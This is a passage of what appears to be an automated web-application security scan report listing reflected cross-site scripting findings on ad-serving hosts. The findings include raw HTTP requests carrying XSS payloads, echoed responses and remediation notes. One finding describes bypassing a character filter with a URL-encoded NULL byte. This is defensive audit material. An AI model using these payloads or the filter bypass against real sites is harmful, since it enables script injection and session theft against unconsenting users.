vstcnt=418b010r1m4me19103210k24ehss103210c24nwh0103210u24fw8l103210t24fi35103210624fs4z103210z24ty31218e10i203210m24egq3218e10q203210x24fu9b218e10q203211024gcxb103210c24fclw103210x24f1fr103210c24omy7103210y24fn0j103210324b47b103210624uz3i10pm10t2459ao10321032455ue103210x24ncl2218e10q203210y24b1xk14tl21221624fu43103210c24wnrf218e115203250220620820921424ebm7103210k24fank103210324vx8f127p10224o5u1103211424tfmw1032100249ujm103210t2450o6103210024fub8103211024rylh103211124uyyu103211424n5kn20pm10c203210024eu86218e10p203210s24sqj810321002453dh103210324u1er218e200202203210324elor218e108203210a24k5jb10pn10c24ferm103211424ferl1032114248umb103210w24mwjf103210m24rm27218e108203210824hgi910321132496o0218e100203210024ef19103210w24p056103210024ep9z218e10q203210v24q28r218e108203210g24mtp4103210024j2vl103211024rcz8218e102203210624h6d7103211424ffmk103210024qqy7127p20020224qfys103210t24dx7s103210m2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lluut6160d5mnk030t602geonZLOWd01mfumewHAhOFkX01md2032u01vvqV0QK5K018qqm2mj01VqkN5H43s017kjb472e012mj01VqoCRKnha017kje59iw010t602U5VzBCfEH000duhMllYZOUL10000eh3j3r010t602Ux0lBKWOP000dnnNsf4RBHGo0002704kzp010t601OnK3JLpHn0003of3ftm010t601NLfLZBxCP0001cz5ga6010t601M1fYxCfX+0000sx4tm1010t601M0QkBMuNQ0000rt4qk0010t601Ms7JhMtyT0000l53ncx010t601MePkBCfDV00007s5awn010t601MbzDxPdaX00005k4th1010t601Mak3hDIUX00004g5gty010t601MVrdZPDCo000000; Domain=media6degrees.com; Expires=Sun, 25-Dec-2011 02:23:53 GMT; Path=/
Set-Cookie: clid=2ll77mm01171voofy6a0tk1w2a31702k4y060r0760y; Domain=media6degrees.com; Expires=Sun, 25-Dec-2011 02:23:53 GMT; Path=/
Set-Cookie: orblb=2ll8nk2072gh20u021a7x60opab0w010opc82k810v010xuvq23a10u010ps6m27y11e0109x0q2gu10u0300zeq00z1q00yg11zw10u0200z2400yjk1y510u0100000; Domain=media6degrees.com; Expires=Sun, 25-Dec-2011 02:23:53 GMT; Path=/
Set-Cookie: rdrlst=43l0pi2lluuxo0000001p4y060klzlluuxo0000001p4y0618eclmxnyj0000000i4y060e0dlluuxo0000001p4y061918lmuv1k0000000m4y06190mlmzkg70000000h4y060e0klluyhn000000174y060d6hll8nk20000002j4y0618ljln2fci0000000f4y061aauln2fci0000000f4y060mollluvl10000001f4y060e0rlluv110000001l4y06007jlluutb02i2z01r4y060w9wlluutb0000001r4y0619drln2fci0000000f4y061196llkg95000000234y061195llnepl09y6p0204y060bnelm6ifs0000000t4y061194lljpq30ogm30244y060bnhlm52500000000u4y0605grlmdlbx0000000q4y0601g3ll8nk20opc802j4y060j4wllv8nq000000134y0617y5lmxnyj0000000i4y06106yln390a0000000d4y061908lmvu190000000l4y061193llnesr0000001z4y060moxlluvec0000001h4y061192lljn150dpv50254y060dt1lluvec0000001h4y060e6mll9m030000002e4y06114qlluutb0000001r4y060e6llluv7p0000001j4y0618zsln2fci0000000f4y060kmmlluw660000001b4y060qhxlne96x000000074y060kk3lluvm30000001d4y06159jlm523d0000000v4y0618k2ln2fci0000000f4y060e5ylluvm30000001d4y060wgclluutb0000001r4y0612anlluuxo0000001p4y060gjzlluv7p0000001j4y060wgmllxcud000000124y0618s1lnailw000000084y060df3lluv110000001l4y060m0tllv8gv000000154y060yc9lluv7p0000001j4y060yzxlluv110000001l4y0616e7ln2fci0000000f4y060wghllv8nq000000134y060gjqllv8nq000000134y06182jlmxnyj0000000i4y06167alluuyr0000001n4y060m9illuuyr0000001n4y060wgrlm522h0000000w4y060m0jllyfqo000000104y0619mblmxnyj0000000i4y06100xllo31q0000001x4y060obllluutb0000001r4y0617nolmxnyj0000000i4y0617gxlmxnyj0000000i4y060ycqlluvl10000001f4y06166wlluv7p0000001j4y061015lluutb0000001r4y060ycmlluv110000001l4y060klalluutb0000001r4y0618l6ln2fci0000000f4y060fyelnailw000000084y060na6llux09000000194y060yzblluutb0000001r4y060spbll9m030000002e4y06101ellrto10000001w4y0615ztll9l280000002f4y0617o3ln2fci0000000f4y0619f2lmxnyj0000000i4y060pdmlluuxo0000001p4y0618kgln2fci0000000f4y0618ktln2fci0000000f4y06101mllrttq0000001v4y0618rjln390a0000000d4y060yyslluuyr0000001n4y060n9qllxcud000000124y060m74lluyhn000000174y060m7elluvm30000001d4y06101ulluutb0000001r4y060lb4llux09000000194y060zp7lluuxo0000001p4y060yy9lluvec0000001h4y0618qgln390a0000000d4y060860lm2xlp0000000z4y060bq5lmivh80000000p4y060caglluutb0000001r4y0617szlmxnyj0000000i4y0608d4lm4som0000000y4y0600c6lluutb0000001r4y0610tyllkjwu000000224y060lb0lluvec0000001h4y0618pqln390a0000000d4y0611z0lluuxo0000001p4y060njjlluyhn000000174y060lazlluuyr0000001n4y060msvll9m030nqw702e4y0610telle7v60j5140274y0612enlluutb0000001r4y0610rdllikks1daf00264y060m3ullv8gv000000154y060wbqlluvm30000001d4y060m44lluw660000001b4y0612llllneum0000001y4y060mj8lluv110000001l4y0612lmlluutb0000001r4y0610kylmivh80000000p4y060kn9lluv7p0000001j4y0612qnllkonl000000214y060mjilluuyr0000001n4y060bo8lmxnyj0000000i4y060dvalluvl10000001f4y060g9zlluw660000001b4y0601hvll8nk20opc802j4y0616iell9m030000002e4y060ga6llux09000000194y0607vglluuyr0000001n4y060fclllv8gv000000154y0618h8lm51zz0000000x4y060ph0lluutb0000001r4y060e15lluvl10000001f4y060o0ulluv110000001l4y0617k1ln2fci0000000f4y06; Domain=media6degrees.com; Expires=Sun, 25-Dec-2011 02:23:53 GMT; Path=/
Set-Cookie: sglst=21l0s9eslluut60000001s4y060r0760yef6lmq6u304o7h0014k000p00600ey7lmq6u30jdl700e4y060r0760e0ixlljn151e0xe0254y060r0760yefjlmq6u30jdl700n4y060r0760ndsolmq6u30jdl700e4u000q00600bzvllikks1yq310264y060r0760yexulmq6u30jdl700e4y060r0760edlell9l281zzd202d4y060r0760yejelmq6u30d26700a4q000q00600e0vllnepl1m5pp01q4u000q006009uklljn151fxf201n4o000p0060090ill9m0327onq02e4y060r0760ybvdlljn151pxe50254y060r0760ydz4lmq6u309dm40064o000p0060056blljn151pxe50214y060r0760j1jzll8nk228n3r02j4y060r0760yecwlmq6u30d2670064q000q006003a6lm51zz1c8nu00x4y060r0760x5l3lluv0y0000001m4y060r0760yecklmq6u30jdl700i4y060r0760if7wlmxnyj0bwgr00i4y060r0760if7xlmq6u304o7h0014k000p00600ag2lle7v6232sn0274y060r0760yet0lmq6u30jdl70094u000q00600ekglmq6u304o7h0014k000p00600edxlmq6u30jdl70054u000q006005nkllnepl1c5qm01j4o000p006009mkllnepl1a98y01h4n000p00600awxln2fck0000000e4y060r0760ecwallnepl1c5qm01j4o000p00600ekzlmq6u30jdl700n4y060r0760nbo8lle7v61lcl101q4o000p00600b3jlmivh80yf6l00p4y060r0760p690lle7v61vck401t4y060r0760aevalmq6u304o7h0014k000p00600ehslmq6u30jdl700n4y060r0760neyzlmxnyj01who0014o000p00600ebblmq6u30jdl700n4y060r0760neyylmq6u30d2670054q000q00600ef0lmq6u30jdl700i4y060r0760ieyvlmq6u30jdl700e4y060r0760ees4lmq6u30jdl700n4y060r0760nfcclmxnyj0bwgr00i4y060r0760i9wvlljn151pxe50254y060r0760yf1wlmq6u30jdl700e4u000q00600eeplmq6u30jdl700n4y060r0760n0tille7v6232sn0274y060r0760yes0lmq6u30jdl700a4y060r0760a45mlluuyq0000001o4y060r0760yerzlmxnyj0bwgr0094u000q006005jillnepl1c5qm01i4o000p00600ezblmxnyj01who0014o000p00600e0wlmq6u304o7h0014k000p00600ee8lmq6u30jdl700e4u000q00600ez9lmq6u30jdl700a4y060r0760a9gellnepl1m5pp01r4u000q00600; Domain=media6degrees.com; Expires=Sun, 25-Dec-2011 02:23:53 GMT; Path=/
Set-Cookie: vstcnt=418b010r1m4me19103210k24ehss103210c24nwh0103210u24fw8l103210t24fi35103210624fs4z103210z24ty31218e10i203210m24egq3218e10q203210x24fu9b218e10q203211024gcxb103210c24fclw103210x24f1fr103210c24fn0j103210324omy7103210y24b47b103210624uz3i10pm10t2459ao103210324ncl2218e10q203210y2455ue103210x24b1xk14tl21221624fu43103210c24wnrf218e115203250220620820921424ebm7103210k24vx8f127p10224fank103210324o5u1103211424tfmw1032100249ujm103210t2450o6103210024fub8103211024rylh103211124uyyu103211424n5kn20pm10c203210024eu86218e10p203210s24sqj810321002453dh103210324u1er218e200202203210324elor218e108203210a24k5jb10pn10c24ferm103211424ferl1032114248umb103210w24mwjf103210m24rm27218e108203210824hgi910321132496o0218e100203210024ef19103210w24p056103210024ep9z218e10q203210v24q28r218e108203210g24mtp4103210024j2vl103211024rcz8218e102203210624h6d7103211424qfys103210t24qqy7127p20020224ffmk103210024dx7s103210m2; Domain=media6degrees.com; Expires=Sun, 25-Dec-2011 02:23:53 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Tue, 28 Jun 2011 02:23:53 GMT
Connection: close
Content-Length: 2377

<IFRAME SRC="http://ad.doubleclick.net/adi/N4848.137909.MEDIA6DEGREES/B5113302.7;sz=300x250;click0=http://ad.media6degrees.com/adserv/clk?tId=9141931727447453|cId=7020|cb=1309227831|notifyPort=8080|ex
...[SNIP]...
<script language="JavaScript">
(new Image(0,0)).src = "http://audit.303br.net?anId=40&pubId=1050&advId=35731&campId=4222&vURL=http%3A%2F%2Fwww.marketbuy54.com45282"-alert(1)-"e2957ef1876";
</script>
...[SNIP]...

1.135. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1843.0.iframe.300x250/ord=1309234816 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1843.0.iframe.300x250/ord=1309234816

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff927</script><script>alert(1)</script>16af8f04416 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1843.0.iframe.300x250/ord=1309234816?click=http://va.px.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwtjDEOwDAIA78SMXfAEHDVN0XdMlX9e0HqdD7Z8Ii7XAPqQR5D3MqoBkcZSiQJGDEJOwPQjJBedscwZVufWTF.zuK916qY_T81yfcDdZIVHw--%26redirectURL=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXMuRHCMBAF0G-uEeM2SHfGWsk6AlogJP9rbU4JdOYyaAco4L0ZE4BbIbW7VWl5o-SlqFjMKq5U5xbJpgGHx_X5nnH8C8s085IkeatSx9plxOK_II2oa09L84ATUO8BZ0wfBlyA144vIQQMInMAAAA%253D%2526dst%253Dff927</script><script>alert(1)</script>16af8f04416 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=46:1990:1225:0:0:45131:1308705162:B2|46:1354:804:44:0:45131:1308705130:B2|46:675:22:0:0:45131:1308705113:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 28 Jun 2011 04:20:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2928

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
52Fclick%253Fcd%253DH4sIAAAAAAAAABXMuRHCMBAF0G-uEeM2SHfGWsk6AlogJP9rbU4JdOYyaAco4L0ZE4BbIbW7VWl5o-SlqFjMKq5U5xbJpgGHx_X5nnH8C8s085IkeatSx9plxOK_II2oa09L84ATUO8BZ0wfBlyA144vIQQMInMAAAA%253D%2526dst%253Dff927</script><script>alert(1)</script>16af8f04416">
...[SNIP]...

1.136. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1843.0.iframe.300x250/ord=1309234816 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1843.0.iframe.300x250/ord=1309234816

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92a11</script><script>alert(1)</script>563994603d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1843.0.iframe.300x250/ord=1309234816?click=http://va.px.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwtjDEOwDAIA78SMXfAEHDVN0XdMlX9e0HqdD7Z8Ii7XAPqQR5D3MqoBkcZSiQJGDEJOwPQjJBedscwZVufWTF.zuK916qY_T81yfcDdZIVHw--%26redirectURL=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXMuRHCMBAF0G-uEeM2SHfGWsk6AlogJP9rbU4JdOYyaAco4L0ZE4BbIbW7VWl5o-SlqFjMKq5U5xbJpgGHx_X5nnH8C8s085IkeatSx9plxOK_II2oa09L84ATUO8BZ0wfBlyA144vIQQMInMAAAA%253D%2526dst%253D&92a11</script><script>alert(1)</script>563994603d1=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=46:1990:1225:0:0:45131:1308705162:B2|46:1354:804:44:0:45131:1308705130:B2|46:675:22:0:0:45131:1308705113:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 28 Jun 2011 04:20:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2934

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
2Fclick%253Fcd%253DH4sIAAAAAAAAABXMuRHCMBAF0G-uEeM2SHfGWsk6AlogJP9rbU4JdOYyaAco4L0ZE4BbIbW7VWl5o-SlqFjMKq5U5xbJpgGHx_X5nnH8C8s085IkeatSx9plxOK_II2oa09L84ATUO8BZ0wfBlyA144vIQQMInMAAAA%253D%2526dst%253D&92a11</script><script>alert(1)</script>563994603d1=1">
...[SNIP]...

1.137. http://ad.yieldmanager.com/imp [u parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The value of the u request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00529be'-alert(1)-'e2b488d60e8 was submitted in the u parameter. This input was echoed as 529be'-alert(1)-'e2b488d60e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /imp?Z=300x250&s=1887835&_salt=2194753117&B=10&u=http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3DINSERT_RANDOM_NUMBER_HERE%26loc%3D%00529be'-alert(1)-'e2b488d60e8&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=1887835
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; cafb=9nsYcb#?ajX4]w9; liday1=Uq::WE].vRW2IxdJDVT^X@u6WVAV)scUXkIW:]HX[x)fP)zdlA!/Hu>j.#Jx; caday1=TlGb]V-`/c!/Hu>cBb-M; bh="b!!!%1!!!?J!!!!)='htq!!(1-!!!!-=(6NF!!*10!!!!$=(5yj!!*lZ!!!!#=$Wj6!!*oY!!!!'=(5yj!!,WM!!!!#=$Wj6!!-?2!!!!+=(5yj!!..X!!!!'=$L=p!!/GK!!!!-=(6NF!!/GR!!!!-=(6NF!!/Ju!!!!$='htq!!/K$!!!!(=(6NF!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!(=(6NF!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=)n!A!!J<J!!!!.=(6NF!!J<K!!!!.=(6NF!!J<O!!!!,=(6NF!!J<S!!!!.=(6NF!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OfW!!!!$=)DMq!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwb!!!!'=(5yj!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!.=(6NF!!j,.!!<NC=)n!A!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!$=(bh!!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=)n!A!#2%T!!!!%=)YC>!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!,=(6NF!#Dri!!!!$=)YC=!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!,=(6NF!#MTF!!!!'=%=]S!#MTH!!!!.=(6NF!#MTI!!!!.=(6NF!#MTJ!!!!.=(6NF!#Nyi!!!!#=!eq^!#O@L!!<NC=):+(!#O@M!!<NC=):+(!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!$=(6NF!#UDQ!!!!.=(6NF!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!$=)YGq!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!$=(6NF!#]Uq!!!!$=(6NF!#]Uy!!!!$=(6NF!#]Z!!!!!*=(5yj!#]Z#!!!!'=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!#=(6NF!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!'=(6NF!#`-[!!!!'=(6NF!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!#=(6NF!#b86!!!!#=(6NF!#b87!!!!#=(6NF!#b8:!!!!#=(6NF!#b8F!!!!#=(6NF!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!#=(6NF!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!$=)YX/!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!#=(6NF!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!$=(6NF!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!$=(6NF!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!,=(6V[!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!$=(6NF!$#X4!!!!#=#%VO!$#yu!!!!,=(6NF!$$I]!!!!#=(6NF!$$Ig!!!!#=(6NF!$$Il!!!!#=(6NF!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'%-!!!!%=)n$<!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!(=(6NF!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!%=)I#r!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$2?y!!!!#=(6?g!$35v!!!!#=(BU="; pv1="b!!!!?!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN!$'!_!$5*F!$xFj!1W47!%asf!!!!$!?5%!'2po7!?vQ,!'o0x~~~~~~~=)Pl)=+N8]!!!([!!3^d!!E)$!$XwX!/+NP!#bCp!'9kN!?5%!(glx6!w1K*!%4=%!$u!@!$F%,~~~~~=(aOb=/%Zq~!#0:.!!#6W!$a+)!2*,b!%vIB!!!!$!?5%!$Tey-![:Z-!':kx!(36D~~~~~~=(h4W~~!$$eQ!!#6W!$a+)!2*,b!%vIB!!!!$!?5%!$Tey-![:Z-!':kx!(36D~~~~~~=(h4W~~!#aQ9!!E)(!$XwW!1wmg!%+@A!!!%%!?5%!)e#I<!w1K*!%4=*!#(jY!'+(>~~~~~=)![p=-6G!~!#3yC#[gVp!$glF!1`)_!%bq`!!!!$!?5%!)e#I<!w1K*!',LB!$iom!'pCX~~~~~=)![y=-6G,~!$3Gv!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~!$3Gx!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~!$3H!!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~!$3H$!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~!$.w1!,x.^!%)<k!2jZq!%v%'!#:m1!?5%!)drC:!w1K*!(#l)!%C9A!(2_O~~~~~=)mWk=*.Pf!!!#G!$19-!,x.^!%)<k!349Y!'$Wk!%G9F!?5%!)drC:!w1K*!(#l)!%C9A!(:t<~~~~~=)m[Z=)yX,!!!#G!$190!,x.^!%)<k!349Y!'$Wk!%G9F!?5%!)drC:!w1K*!(#l)!%C9A!(:t<~~~~~=)m[Z=)yX,!!!#G!#`UZ!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U]!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U_!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`Ua!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#RZY!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ[!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ^!,x.^!%)<k!,y[%!$_E6!+,Cq!!5